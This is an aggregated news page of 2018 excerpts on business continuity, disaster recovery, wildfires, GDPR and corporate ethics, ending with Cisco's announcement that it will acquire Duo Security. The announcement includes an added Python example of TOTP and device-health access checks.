
Industry Hot News


It is a strange irony that the changes organizations make to remain competitive frequently open them up to risk in their DR/BCM program and recovery capability.

But when it comes to business continuity, the IT change management (CM) process at most organizations is integrated in name only.

Many organizations are ambitious about making changes that will drive the business forward and are careful regarding the implementation of those changes. But the need to keep the recovery plans and environment in sync with the production environment is frequently an afterthought.

In the event of a disruption, this can have impacts on the business ranging from inconvenient to calamitous.

In today’s post, we’ll discuss some of the main issues with CM from a business continuity perspective. We’ll also share some tips on what business continuity professionals can do to make sure that routine system and process changes do not leave the organization vulnerable to major impacts.



Network management is often neglected, yet the availability and reliability of the network are essential to a whole host of mission-critical activities. Kevin Drinkall challenges organizations to consider whether they are giving enough attention to their network.

Technology expectations of businesses and employees are growing and changing every day. But the underlying network that enables us to use this technology properly can’t always keep up. Instead of being the power behind it, networks often prove inflexible when it comes to getting the most out of technology in the working environment.

This is a huge problem for businesses of all shapes and sizes that need to adopt new technology to support their staff and processes, and for those wanting to embrace IoT and future innovations to stay ahead of the curve and attract a ‘tech-savvy’ workforce.

‘The whole is only as good as the sum of its parts’ has never been more apt. Amid the excitement around the role of technology in the workplace, the connectivity, speed, security and management of the supporting network that makes it all work are often an afterthought.



The Business Case for a Strong Culture of Ethics

Culture and ethics are all the rage in management theory and compliance discussions, but we never see them discussed as absolutely dependent on one another. If the ethics of the organization aren’t right, the culture will never be right. We explore this new way of thinking about this critical component of business strategy.

“If culture eats strategy for breakfast, ethics are the fork and knife.” – Snyderman Law Group

If you’ve been paying attention to any of the management theories that have been introduced within the past 10 years, you’ve no doubt been hit over the head with the notion that company culture drives an organization forward. Culture affects employee engagement and retention and can therefore boost profits. We now know that culture is a company’s personality and that it shows not only your employees, but also the rest of the world what kind of organization you really are.

Cultivating a company culture is no longer an option; it’s a necessary part of doing business. We are seeing more and more that a company’s culture is more important than salary for many employees. This epiphany came thanks to the millennials’ entrance into the workforce. Going to work every day to a place you love is not a new idea, but as Simon Sinek told us, millennials are the first ones to have the guts to expect it. We are now in the age of “whenever, wherever, whatever.” People no longer want to work a 9-to-5 job in an office for the rest of their career. They want to work whenever they want, wherever it’s convenient for them and for whatever length of time they decide.



Managing the challenge of data management, retention and availability is an ongoing issue for most organizations. In this article, Gordon Cullum explains where data virtualization can help; and where it won’t.

Data virtualization has often been heralded as the answer to enterprises caught in a vicious circle in a world riddled with data, both online and offline. However, it is important to remember that no technical solution is a silver bullet and data virtualization should not be thought of as a one stop solution for all an enterprise’s needs.

Businesses want to act and improve their decision-making in real time whilst containing costs and supporting business-as-usual activities, which can leave CIOs struggling to navigate through an array of complex applications and systems.

Deployed with the right capabilities and methodology, data virtualization lets businesses leverage existing investment to meet current and future analytic needs without compromising on quality, budget or time.



(TNS) — The summer of seemingly endless rainfall took its toll again on the Berks County, Pa., region Monday, dumping several inches of precipitation that led to widespread flooding on areas already inundated in recent weeks.

And if the rain doesn't let up, meteorologists are predicting this August could prove to be the wettest ever recorded.

AccuWeather meteorologist Danielle Knittle said that 9.06 inches of rain has been recorded this month at Reading Regional Airport in Bern Township, the official site for Berks County rainfall totals.



Talk about your one-in-a-million situations. On June 13th, an EF-2 tornado struck the township of Wilkes-Barre, Pa. in the dark of night. For a city of approximately 40,000, this was an unusually powerful tornado, given how briefly it stayed on the ground. Once it struck, the tornado took a death-defying trip through the Wilkes-Barre Township business district, then ravaged the local mall before heading down a major thoroughfare, Interstate 81.

In the northeast, nighttime tornadoes are practically unheard of. In fact, since 1950, only 2.2 percent of the more than 850 tornadoes recorded in the Keystone State have occurred between 10 p.m. and midnight. Nighttime tornadoes are especially dangerous because you can’t see them coming, and they strike at a time when people are less focused on the weather.

Tammac Holdings Corporation, a local financial services company that specializes in programs for the manufactured housing industry, sat directly in the path of this unusual twister. What’s more, it prides itself on its responsiveness to customer needs, so being in an exposed location was particularly dangerous.



In 2017 Continuity Central published the results of a survey looking at whether the increasing focus on information security is having an effect on the traditional demarcation lines between business continuity and information security management (ISM). In 2018 we repeated that survey to monitor how things have developed and the results of the survey are now available.

Is information security a business continuity issue?

62 percent (64.5 percent in the 2017 survey) of respondents believe that information security is definitely a business continuity issue, with a further 29 percent (32 percent*) saying that it was partially a business continuity issue. 9 percent (3.5 percent*) said that information security is not a business continuity issue at all.

It seems clear from both the 2018 and the 2017 versions of the survey that information security is viewed as a business continuity issue; but to what extent do business continuity teams actually get involved in preventing and managing information security incidents? The remainder of the survey examined these areas:



(TNS) — Before the flames appeared, Sandie Freeman thought the sky above her Redding home looked especially beautiful.

The evening was golden hued and still; pretty enough that she took a picture. Minutes later, a light wind picked up and leaves from her oak tree began falling like rain, she said.

It was the only warning she received that something was amiss.



This spring, Bluelock Solutions from InterVision conducted a survey titled “2018 Legal Data Protection & Recovery,” focusing on the legal industry. The results found an overconfidence and mismatched expectations toward IT disaster recovery (IT-DR) within law firms. Here are a few responses that stuck out to us:



Wednesday, 15 August 2018 15:27

Airline Outage? Pick up a Pencil

Airline outages are all too common – we’ve documented the many issues major U.S. airlines have faced on this timeline.

When IT fails and airline workers can’t check in passengers or issue tickets, out come the pencils, pens and paper.


Wednesday, 15 August 2018 15:16

One Size Fits All

Over the course of an implementation, it’s inevitable that almost every customer asks us, “What’s the best way to do this?” We always have an answer, but the real answer depends heavily on your organization and its unique context as it relates to continuity. Each of our customers is unique and has different needs based on vertical market, size, structure and program maturity, among other things.

Everyone has been given those (typically free) t-shirts and hats marked “one size fits all”. The truth is, they seldom do. They’re either too big, too small or just not right. They might be close, but usually something is a little off. Similarly, there is no single “right” approach to building a business continuity program. It should be flexible and malleable, able to change and grow as your organization inevitably does.

Given the variation among our customers’ businesses, BC in the Cloud has worked to create plan templates that are specific enough to capture the heart of the ISO and DRI standards, but generic enough to be adapted to particular needs.


Campus communications for colleges and universities are necessary not only to keep day-to-day operation flowing, but also for the safety of your students and stakeholders.

This has become increasingly important as some campuses have become targets for violence rather than havens for students. With so many threats – from severe weather to active shooters – school officials must have a plan for communicating with their students, faculty, staff and stakeholders in a variety of critical situations.

Follow these tips to improve your campus communications as the new semester begins.



(TNS) - When Aledo and Joshua students head back to class, they’ll find police officers on their campus full time.

Weatherford students will know that some teachers and school employees likely are carrying concealed handguns.

And Fort Worth students will know police are monitoring school safety cameras in real time — and that school nurses are getting trained to treat victims of active shooters.

“We are consistently looking out for our kids,” said Susan Bohn, superintendent of Aledo schools, adding that teaching students in a safe environment is an everyday concern. “It’s never something that is out of our minds.”



(TNS) - With a “fire tornado” racing toward Redding neighborhoods on July 26, emergency officials in Shasta County started issuing mandatory evacuation orders.

They used reverse 911 calls, emergency announcements on TV and radio, opt-in text message systems and Amber alert-style cellphone warnings to get the word out.

And, as in Sonoma County in October, first responders went door to door, urging people to flee.

Three people perished, but thousands escaped as flames engulfed their neighborhoods, with authorities turning some two-way streets into one-way streets to facilitate traffic.

Credit lessons learned in October, when Sonoma County authorities, fearing panic, failed to use all of the tools at their disposal to warn residents about a ferocious wildfire that burned thousands of homes and took more than 20 lives.



GDPR effectively forces companies to go public with any cyber attack that compromises personal data, which poses further challenges when it comes to protecting their reputation. However, a quick and effective response to a cyber attack is impossible without thorough planning and forethought. Jonathan Hemus offers some points to consider ...

The General Data Protection Regulation (GDPR), which came into force in May this year, has fundamentally changed how organizations must respond to a cyber attack. The onus is on organizations to report a personal data breach to the supervisory authority within 72 hours of becoming aware of it, or face hefty fines.

The short-term financial cost of a cyber attack can be significant but of equal concern is the damage it can do to an organization’s reputation and its stakeholders. For example, in November last year, the world’s largest shipping container line, AP Moller-Maersk, said the cost of the cyber-attack it suffered amounted to $300m, forcing it to cut its profit guidance and sending its share price down seven percent.

But for many organizations, cyber attacks can often tempt bosses to focus on the short-term financial impact at the expense of focusing on the longer-term reputational implications.



This is part 1 of a 3-part series on Digital Innovation Management. This blog series is intended to help a digital transformation team take a structured and measured approach to building enterprise scalable Digital Innovation Management capabilities.  

Digital transformation means leveraging new technologies that redefine the ways people live and work. With economic benefits over the next decade estimated at $100 trillion, it is no surprise that half of all corporate boards have elevated digital to the CEO agenda.

An organization that has formulated its digital strategy needs to launch it by enabling key elements of the Digital Operating Model:

  • Digital Innovation Management
  • Digital Product Management
  • Digital Workforce Enablement



(TNS) - Fresno Police Department’s dispatchers answer every type of 911 call made within city limits — among other responsibilities.

They answer calls for medical aid, reports of fire, or when people report violent crimes like shootings and homicides. They take non-emergency calls, like when people call 911 looking for police detectives or to check a pending case.

They take the call when a suicidal person asks for an officer to arrive before their family finds their body. They answer the call when rape victims report the crime — sometimes as it’s happening.



Some people who hire business continuity consultants think of them as being like waiters: they expect the consultant to serve them at their leisure then quietly go away, allowing them to enjoy an excellent meal.

However, in my experience—I have been the CEO of a business continuity consulting and SaaS (software as a service) firm for 19 years—companies with this attitude do not get very much out of their consulting engagements, and their programs are the weaker for it.

The best business continuity managers and corporate leaders recognize that working with a BC consultant is, at its best, a lot like dancing the tango.



Friday, 10 August 2018 14:30

Duty of care—you might have heard the phrase tossed around by companies touting their dedication to their employees. You might just associate it with liability lawsuits and big payouts. But what exactly is it?

According to Collins Dictionary, duty of care is “the legal obligation to safeguard others from harm while they are in your care, using your services, or exposed to your activities.”

It’s clear from this definition that duty of care applies to all kinds of organizations, from churches and Boy Scout groups to hospitals and schools.


From coast to coast, severe weather is a problem for every community.

To better protect your constituents during storms and other forms of severe weather, consider ways you can get better prepared, including evaluating your communication methods.

Inclement Weather Alerting

Throughout the US, predominant weather patterns vary from region to region. From mudslides, earthquakes and droughts to hurricanes, tornadoes and floods, no region is untouched by natural hazards. In order to best protect your community, focus on how to provide mass notification before, during and after such disasters.

Long before severe weather becomes a real threat, your organization must already have plans in place and ready to be activated, especially when it comes to sending mass notifications. At the first indicator of inclement weather, put your organization’s communication and response strategies into action. Be sure a reliable method of communication is set up, tested and fully prepared for such emergencies.



Has your organization ever been attacked by zombies? We don’t know any companies that have been, although we do know some that have used this as a scenario in their disaster recovery exercises.

In today’s post, we will discuss the pros and cons of using zombie attacks and similarly imaginative scenarios in your mock disaster exercises and also share some general tips on how to make the most of such exercises.

To begin, we will provide you with a quick refresher on the different types of DR exercises that businesses commonly conduct to assess and improve their capability to respond to emergencies.



An organization’s greatest asset is its employees, but the impact that new recruits have on a company’s success is sometimes less clear. Or is it? New international guidelines have just been published that give recruiters a metric to measure just how well they have done.

When it comes to recruitment, finding the right person for the job not only fills an employment gap, it can have a significant impact on the organization as a whole. Recognizing this, HR departments are now often strategic partners within a company, so measuring the impact of their expertise not only demonstrates their value, but allows for continuous improvement as well.

Measuring the “quality of hire”, or the benefit that newly employed staff bring to a company, is therefore essential to determine the effectiveness of the recruitment process.

Recently published, ISO technical specification ISO/TS 30411:2018, Human resource management – Quality of hire metric, outlines international best practice to do just that. It identifies metrics that can be used to evaluate the link between the new person’s work and the success of the organization.  



Steps to Improve Forensic Analytics

Thanks to advances in forensic analytics, we can spot emerging risks long before they come to fruition. But predictions frequently lead to false positives. Satish Lalchand discusses how to prevent them in this third installment of a series on the future of forensics, following articles on the application of data-driven analytics and how the uses and quality of data drive analytics insights.

Forensic analytics — the combination of advanced analytics, forensic accounting and investigative techniques — is making breakthroughs every day in identifying rare events of fraud, corruption and other schemes. To meet rising regulatory and customer demand for fraud mitigation, forensic analytics can reveal signals of emerging risks months — or sometimes even years — before they happen. Of course, predicting anomalous events can also create false positives.

In an effort to reduce false positives in fraud investigations, careful attention should be paid to steps including:



(TNS) - When a special legislative committee held its first public hearing in response to the North Bay wildfires two weeks ago in Sacramento, there were eight major wildfires burning across California.

When the 10-member bipartisan panel met again Tuesday, the number of conflagrations had doubled, and the marauding Mendocino Complex fires had scorched more than 292,000 acres in three counties or more than 450 square miles.

The hearing, however, was decidedly low key, as representatives from the state’s big three investor-owned utilities and two public power providers, including Healdsburg’s municipal utility, recited the steps they have taken and plan to take to mitigate future wildland blazes.



Wednesday, 08 August 2018 15:55

Cryptomining Malware On The Rise

How to Prevent the Risk of Crypto-Jacking

New cryptomining malware uses a leaked NSA exploit to spread between Windows machines, disabling security software and opening the door to further attacks on infected computers. Now is the time for enterprise IT to fortify its defences. Chris Olson, CEO at The Media Trust, provides background on cryptomining and discusses best practices for preventing related incidents.

Cryptomining is the new jackpot for cybercriminals. As cryptocurrencies have grown in popularity and value, cryptocurrency mining has turned into a lucrative business. Around the globe, thousands of websites operated by some of the world’s most recognized companies and government agencies have been compromised by malicious actors who inject mining scripts that run in visitors’ browsers, harvesting the visitors’ CPU power for the attackers’ mining operations.

However, when it comes to cryptomining, the industry’s focus is on the attacks and the compromised devices rather than on the root cause. These attacks are a symptom of a deeper problem in the digital ecosystem: most enterprises do not have full visibility into the third-party code rendering on their websites and mobile apps. Those third parties make ideal targets for malicious actors, who continuously probe for ways to make money and secure greater returns on their efforts.


(TNS) - It’s day 11 for Omar Estorga on the front lines of California’s firestorm.

Some nights, the captain and his crew have slept — sitting up — in the seats of their fire engine as the Carr fire raged. Other nights, they’ve stayed at the base camp in Shasta County. On their days off, they’ve snagged dorm rooms at Shasta College or, if they’re lucky, a hotel room when another fire crew has checked out.

As some 14,000 firefighters wrap up their second week battling more than a dozen destructive wildfires across the state, fatigue is setting in, but the fires show few signs of letting up.

To the south, the sprawling Mendocino Complex inferno on Monday became the largest fire ever recorded in California, burning more than 283,000 acres in just 11 days. The Ferguson fire has closed parts of Yosemite National Park indefinitely. Large swaths of the Sacramento Valley have been choked by smoke for days.



The UK consumer response to the General Data Protection Regulation (GDPR) is shifting. New research by SAS, ‘GDPR: The right to remain private’, reveals that more people are activating their new personal data rights, and faster, than expected. At the same time, the Facebook/Cambridge Analytica data scandal has made the majority of consumers either activate their rights, or at least reassess the information they share and how organizations use it.  

In 2017, SAS surveyed UK consumers for their views on the regulation, revealing that 42 percent planned to exercise their rights within a year of GDPR coming into force. However, the new research shows that 31 percent have already activated their rights over personal data, and 55 percent will have done so within a year.

GDPR came into effect in May, making organizations accountable for personal data protection and giving consumers significant new powers over their personal data. These new powers include the rights to access, query and erase the data held about them by organizations.



Tuesday, 07 August 2018 14:27

Slavery in the supply chain

The threat of slavery or unethical behaviour in a firm’s supply chain is not receiving the attention it should, particularly from those who work in crisis management.

Firms are judged by the company they keep, and if they employ or work with partners who are guilty of such practices, this represents a massive potential hit to an organisation’s reputation. Crisis managers are currently so obsessed with all things cyber that this major risk is being left unattended.

Companies or partners that form part of a firm’s supply chain need to adhere to its own high ethical standards, but this can be hard to police.

Lead paint

A few years ago, I was brought in to help extricate a client from an ethical crisis. One of their premium brands is a very well-known set of children’s toys. These were made in China, and the client discovered that the manufacturer had swapped out the agreed paint for a cheaper brand, which contained high levels of lead, and used it in the manufacturing process. Young children put toys in their mouths and quite often chew! Parents are pretty resistant to their little darlings sucking on lead.

The company had agreed with the Chinese makers which lead-free paint should be used and had even installed detectors in the factory that checked for lead contamination. These were left to gather dust. The brand went on to feature in the New York Times for all the wrong reasons.


Monday, 06 August 2018 14:34

Tornado Rips through Webster, Mass.

(TNS) - A tornado packing 110 mph winds hit Webster with “no warning at all,” tearing up Main Street, cutting off power and displacing 25 people, with one driver injured by flying debris.

It swept into town as a line of powerful storms rolled through the state yesterday, leaving flash flooding and broken tree limbs in its wake before heading out to sea.

“It’s horrible,” said Ann Lavallee, 25, of Webster. “It hit Main Street. It blew out the windows of some buildings. Some businesses were destroyed. There are fallen tree limbs ... flooding.


(TNS) - Patience is wearing thin in Greenbrier County, W. Va., where some people continue to live in marginally habitable structures more than 25 months after the deadly flood that claimed nearly two dozen lives and caused millions of dollars of property damage across West Virginia.

Meanwhile, the state’s RISE program is in possession of nearly $150 million in HUD funding intended to assist low-income flood victims with their housing needs.

To date, the amount spent on home placement, construction and rehabilitation totals $784,407.75, according to the man who earlier this summer took charge of the RISE program, Maj. Gen. James Hoyer, adjutant general of the West Virginia National Guard. An additional $583,000 has been obligated for payment of outstanding invoices, he added.



(TNS) - Even as fires rage across California, thousands of new homes are being built deeper into our flammable foothills and forests, as lethal as they are lovely.

A recent surge in subdivisions in high-risk wildlands is putting more of us in harm’s way, say experts. For millennia, wildfires just burned trees; now they’re claiming homes, with heirlooms, pools, family photos, pets, cars and precious lives.

“It’s the ‘expanding bull’s eye’ effect,” said geographer Stephen M. Strader of Villanova University, who tracks population growth in high-risk areas. “Cities are moving into regions where there were no people before. People and wildfires are coming together more often.”



Daniel Perrin, Global Solutions Director, Workplace Recovery, IWG

With hurricanes and other natural disasters impacting the U.S., now, more than ever, companies are re-examining their business continuity plans. Traditional workplace recovery strategies haven’t kept pace with modern business needs, though. Historically, companies built their strategy around IT. This meant that when disaster struck, to keep critical staff working, businesses needed access to their data.

The solution was to keep offices near a recovery server, ready for when a problem shut the office down. If that happened, businesses would send the 20 or so needed staff to work from space next to the server. That’s the model the industry has followed, but it is a model that is now outdated.

Why? There are three main reasons:
  1. Technology has evolved dramatically since most large businesses first developed a workplace recovery strategy. The rise in cloud computing means that data is not housed in one particular place. It can be accessed from anywhere. This means a recovery plan no longer needs to be based entirely on the location of servers. It can be based on what works best for your business at a particular time.
  2. Recovering to one fixed location can be a logistical nightmare – if not ill-advised. Of course, if a small leak in an office has rendered it unusable, you can move staff to a specific, identified back-up office. But, what if your city is flooded or facing another equally significant impact event? Chances are one of two things will occur, if you are dependent for recovery on one specific location. Either your back-up location will also be hit or your people won’t be able to get there. In today’s world, a smart business needs to develop a workplace recovery strategy that is responsive and dynamic. One which can evolve to a live situation.
  3. The traditional financial model of making workplace recovery centers profitable revolves around oversubscribing each one – essentially selling the same “seat” to 10 or so different businesses. This makes sense based on the assumption that different businesses will not need recovery at the same time. But, in the example above – a major incident affecting large swathes of a city – chances are multiple companies will be impacted. Businesses therefore run the risk that at the one time they need the recovery seat they’ve been paying for, someone else may be sitting in it.


What makes a dynamic workplace recovery provider?

Primarily, one that offers a network of locations to choose from and offers flexibility to meet customers’ needs. And, a provider that will guarantee you space in any type of emergency, especially ones that impact entire cities.

For example, when Hurricane Harvey hit Texas in 2017, Regus, which provides flexible workspace and is owned by IWG, had the capacity to ensure that customers could continue working because it had 70 locations in the area. One of our customers wanted to recover to one of our offices in the Woodlands, outside of Houston. This seemed sensible, but as the storm approached it became clear that this client’s employees would not be able to reach the site. We were able, proactively, to contact the customer and adapt their plan in real time, by the minute, recovering them to another location that would not be affected.

Businesses are realizing that workplace recovery plans are critical and that their current plans may not be fit for purpose. It’s a good time for companies to evaluate their plans and ensure that they are working with dynamic partners that have the flexibility to meet their needs.

For more information, visit http://www.iwgplc.com/.

The Need for a Chief Privacy Officer

Nearly every day we hear about another data breach at a major corporation, making the case for a chief privacy officer (CPO) more compelling now than ever. Adams and Reese attorney Roy Hadley discusses the various reasons organizations should employ a CPO.

2.5 quintillion bytes of data — that’s the amount of data estimated by some to be created every day.

Yes, that is 2,500,000,000,000,000,000. Every day.

To put that number into perspective, the length of 1,000,000,000,000 (one trillion), $1 bills laid end to end measures approximately 96,906,656 miles. This would exceed the distance from the earth to the sun. A quintillion is equal to one million trillions. That is a long line of dollar bills!

Mind-boggling as that number is, the internet of things is expected to make the amount of data created grow further still. It is remarkable how this data is created. According to Forbes.com, more than 3.7 billion humans use the internet every day. On average, Google processes more than 40,000 searches every second, which translates to 3.5 billion searches each day. Further, every minute of the day, Snapchat users share more than 500,000 photos.

In short, the amount of data we are creating is hard to fathom.



Friday, 03 August 2018 16:56

Data Here, Data There, Data Everywhere

This article by Clinton Jayne looks at individual organizations around the world and what their supply chains may have to endure during this period of geopolitical instability, when trade arrangements seem to change daily and the long-term impact of potential arrangements such as Brexit is largely unknown and not transparent.

I am not an economist and make no attempt to look at national economies and their individual circumstances. I also do not consider myself a politician (a fact I am immensely happy about) and do not look at political imperatives that drive the trade uncertainties. The point of this article is to look at individual supply chain circumstances and what organizations may need to do to ensure their survival and longevity.

Those expressing concerns

So, having explained the context let’s consider some of the known outcomes (taken from news broadcasts) thus far.

Airbus recently completed a study of its UK circumstances and the possible impact of Brexit and the customs union. Its factory, which employs 14,000 people, produces wings and relies on the supply of aluminum and other products, not all of which are produced in Britain. I have no idea what the detailed findings are, but the company’s warning to the politicians indicates that the impact could be very significant.



Congress this week temporarily extended the National Flood Insurance Program (NFIP) until November, avoiding a lapse of the program but also avoiding any needed reforms.

Up until Hurricane Katrina in 2005, the program was, for the most part, self-sustaining, sometimes taking short-term loans to keep up. But last year the debt reached almost $25 billion, of which $16 billion was forgiven by Congress last November. The debt is now $20.5 billion.

Critics believe the program, in its current form, is unsustainable and needs reforming. Otherwise, another season like last season, with hurricanes Harvey, Irma and Maria, could require forgiving more debt.



King Neptune gets power from his three-pronged trident, and those of us who work in business continuity can gain power from what I call the BCM Trident. That is, the three key performance indicators (KPIs) that can help you understand and improve your business continuity program.

These three KPIs are soundness, risk, and value.

In today’s post, I’ll talk about each one and explain how you can leverage them to sharpen your BCM program.



The year 2018 continues to see big changes in the practice of IT/Disaster Recovery, but the core concepts for achieving an effective solution for IT and disaster recovery in 2018 remain the same as ever.

In today’s blog, we’ll take a helicopter tour of what has and hasn’t changed in IT/DR recently, then look at how you can determine what approach is best for your organization.

Cloudy Weather

The big trend in disaster recovery is the continued growth in the use of DR in the cloud, where organizations replicate their data and servers to a cloud computing environment and recover and process from there in the event of a disruption. Organizations use cloud-based infrastructure to recover virtual servers (and potentially physical servers, via a physical-to-virtual (P2V) migration process).

A related option is DR as a service (DRaaS), where a third-party vendor keeps the company’s data and a cloud environment in sync with production. When there’s a need, the service provider spins up the replicated environment from the cloud.



A Bribe is a Bribe

Why do organizations use sanitized language rather than more direct verbiage? A new generation of business leaders and employees is beginning to question the need for corporate speak. Michael Volkov discusses the need for a new approach.

Language communicates more than just words – indeed, the use of language reflects much more than simple communication. Often, a person’s language reveals an attitude, a feeling, a perspective and much more. I am often struck by how language is used by corporations to mask a clear and distinct idea. Corporate speak is a language unto itself; it can reflect a company’s culture and its commitment to honesty, trust and integrity.

Forgive me for questioning the use of corporate language, but when I read phrases such as “improper payments,” “questionable payments” and other equally vague terms used to describe flat-out bribes, I question the need for companies to avoid using accurate language. My overriding question in these circumstances is, why can’t the company use straightforward language?

A bribe is a bribe, and no matter how you characterize the payment, it is still a bribe. Of course, I recognize that in order to violate the FCPA or domestic bribery laws, a payment must be made with “corrupt” intent. In the FCPA context, a payment must be made with intent to influence a foreign official to act contrary to his or her official duties. Assuming that a payment is made with the requisite intent, such a payment constitutes a bribe.



Thursday, 02 August 2018 14:34

Corporate Doublespeak

(TNS) - When the radio of a Bakersfield police officer breaks, the IT department doesn’t call the manufacturer for a replacement. They go to eBay to try to find extra parts.

The 20-year-old public safety radio system for both Bakersfield and Kern County is outdated. The manufacturer of the radios no longer services the devices nor produces parts for upgrades.

Agencies like the Bakersfield Police Department and the Kern County Sheriff's Office use their radio systems for officers and the dispatch centers to communicate with each other.

The city and county have begun formulating a strategy for updating the aging analog system to digital.



If your organization has a heavy focus on analytics as part of the digital wave affecting oil and gas companies today, you’re very likely to start hearing the Agile Scrum framework seeping its way into conversations; however, not every team can or should leverage Scrum, depending on their team structure and needs.  If your team wants to benefit from Agile principles without utilizing Scrum to do so, there is a path forward.

One good example of a team that may not benefit from defined, time-boxed sprint cycles is a data science team. In many cases, the business will reach out directly to these key resources, who will subsequently build a model using their own methodology, store data and R/Python code on their laptops, and remain skeptical about collaborating effectively with others. As a manager, this can be a frustrating prospect, since visibility around resource management and project progress can be limited. By leveraging some best practices from Agile principles and values (rather than implementing full Scrum), analytics managers can determine where in a project a team member is, what work is being performed over what timeline for resource management, and where code will live, in case someone loses a laptop or wins the lottery.



Thursday, 02 August 2018 14:22


Acquisition Will Help Accelerate Cisco’s Intent-Based Networking Strategy, Allowing Customers to Securely Connect Users to Any Application on Any Network


SAN JOSE, Calif. – In a release issued earlier today by Cisco (NASDAQ:CSCO), the company is updating a link in the release.

Cisco Announces Intent to Acquire Duo Security
Photo caption: From left to right: Duo Security co-founder and CEO Dug Song; Cisco security business SVP Gee Rittenhouse; and Duo Security co-founder and CTO Jon Oberheide.

Cisco (NASDAQ:CSCO) today announced its intent to acquire privately-held Duo Security, headquartered in Ann Arbor, Mich. Duo Security is the leading provider of unified access security and multi-factor authentication delivered through the cloud. Duo Security’s solution verifies the identity of users and the health of their devices before granting them access to applications – helping prevent cybersecurity breaches. Integration of Cisco’s network, device and cloud security platforms with Duo Security’s zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device.

Under the terms of the agreement, Cisco will pay $2.35 billion in cash and assumed equity awards for Duo Security’s outstanding shares, warrants and equity incentives on a fully-diluted basis.

“In today’s multicloud world, the modern workforce is connecting to critical business applications both on- and off-premise,” said David Goeckeler, executive vice president and general manager of Cisco’s networking and security business. “IT teams are responsible for protecting hundreds of different perimeters that span anywhere a user makes an access decision. Duo’s zero-trust authentication and access products integrated with our network, device and cloud security platforms will enable our customers to address the complexity and challenges that stem from multi-and hybrid-cloud environments.”

Business-critical data and applications today are accessed by customers, partners and employees from a multitude of locations and networks, both secure and open, using company-issued and personal devices. Attackers know that one of the most effective ways to access enterprise systems is through compromising user passwords or devices. According to the 2017 Verizon Data Breach Investigations Report, the majority (81 percent) of hacking-related breaches involved stolen or weak passwords. Acknowledging this, Cisco and Duo Security are closely aligned in the approach of designing infrastructure for the extended enterprise where users, devices and applications are the center of the modern security architecture.
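The gate Duo describes, a second factor plus a device-health check before an application grants access, is simple to express in code. The following Python is an added example written for this page, not Duo’s or Cisco’s implementation: it verifies an RFC 6238 TOTP code (HMAC-SHA1, 30-second step, one step of clock skew, constant-time comparison), evaluates a device-posture report against a small policy, and grants only when both pass. The posture fields, the policy thresholds and the demo’s use of the RFC 6238 test-vector secret are this example’s own assumptions.

```python
"""Added example: a zero-trust style access decision that checks a TOTP second
factor (RFC 6238) and a device-posture report before granting access.
Illustrative code for this page, not Duo's or Cisco's implementation; the
posture fields and policy thresholds are assumptions."""
import base64
import hashlib
import hmac
import struct
import time

# Secret from the RFC 6238 test vectors (ASCII "12345678901234567890"),
# used only so the demo below has known-good codes to check against.
RFC6238_TEST_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def totp(secret_b32: str, timestamp: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time counter, dynamically truncated."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    counter = struct.pack(">Q", timestamp // step)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_totp(secret_b32: str, submitted: str, timestamp: int,
                step: int = 30, skew_steps: int = 1) -> bool:
    """Accept the code for the current step and +/- skew_steps neighbours (clock
    drift), comparing in constant time so timing cannot leak digit matches."""
    for delta in range(-skew_steps, skew_steps + 1):
        expected = totp(secret_b32, timestamp + delta * step, step)
        if hmac.compare_digest(expected, submitted):
            return True
    return False


# Device-health policy (assumed fields; a real agent reports many more).
POLICY = {
    "min_os_version": (10, 15),      # compared as (major, minor)
    "require_disk_encryption": True,
    "require_screen_lock": True,
    "max_days_since_av_scan": 7,
}


def device_failures(posture: dict) -> list:
    """Return the list of failed policy checks; an empty list means healthy.
    Missing fields fail closed (they count as a failure, not a pass)."""
    failures = []
    if tuple(posture.get("os_version", (0, 0))) < POLICY["min_os_version"]:
        failures.append("os_outdated")
    if POLICY["require_disk_encryption"] and not posture.get("disk_encrypted"):
        failures.append("disk_not_encrypted")
    if POLICY["require_screen_lock"] and not posture.get("screen_lock"):
        failures.append("no_screen_lock")
    if posture.get("days_since_av_scan", 999) > POLICY["max_days_since_av_scan"]:
        failures.append("av_scan_stale")
    return failures


def access_decision(user_secret_b32: str, submitted_code: str, posture: dict,
                    now: int = None):
    """Grant only when BOTH the second factor and device health pass.
    Returns (allowed, reasons); reasons lists every failed check."""
    now = int(time.time()) if now is None else now
    reasons = []
    if not verify_totp(user_secret_b32, submitted_code, now):
        reasons.append("bad_second_factor")
    reasons.extend(device_failures(posture))
    return (not reasons, reasons)


if __name__ == "__main__":
    healthy = {"os_version": (10, 15), "disk_encrypted": True,
               "screen_lock": True, "days_since_av_scan": 2}
    # At T=59 the RFC 6238 vectors give code 287082 for this secret.
    print(access_decision(RFC6238_TEST_SECRET, "287082", healthy, now=59))
    print(access_decision(RFC6238_TEST_SECRET, "287082",
                          dict(healthy, disk_encrypted=False), now=59))
```

Both checks always run and every failure is recorded, so an operator can tell a wrong code from an unhealthy device, but access is denied when either fails; a posture field the agent did not report is treated as a failure rather than silently passing.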

The acquisition of Duo Security will:

  • Extend intent-based networking into multicloud environments. Cisco currently provides on-premises network access control via its Identity Services Engine (ISE) product. Duo’s software-as-a-service (SaaS) model will be integrated with ISE to extend it to cloud-delivered application access control.
  • Simplify policy for cloud security. By verifying user and device trust, Duo will add trusted identity awareness into Cisco’s Secure Internet Gateway, Cloud Access Security Broker, Enterprise Mobility Management, and several other cloud-delivered products.
  • Expand endpoint visibility coverage. Cisco’s in-depth visibility of over 180 million managed devices will be augmented by Duo’s broad visibility of mobile and unmanaged devices.

“Our partnership is the product of the rapid evolution of the IT landscape alongside a modernizing workforce, which has completely changed how organizations must think about security,” said Dug Song, Duo Security’s co-founder and chief executive officer. “Cisco created the modern IT infrastructure, and together we will rapidly accelerate our mission of securing access for all users, with any device, connecting to any application, on any network. By joining forces with the world’s largest networking and enterprise security company, we have a unique opportunity to drive change at a massive scale, and reshape the industry.”

The acquisition is expected to close during the first quarter of Cisco’s fiscal year 2019, subject to customary closing conditions and required regulatory approvals. Duo Security, which will continue to be led by Song, will join Cisco’s Networking and Security business led by EVP and GM David Goeckeler.

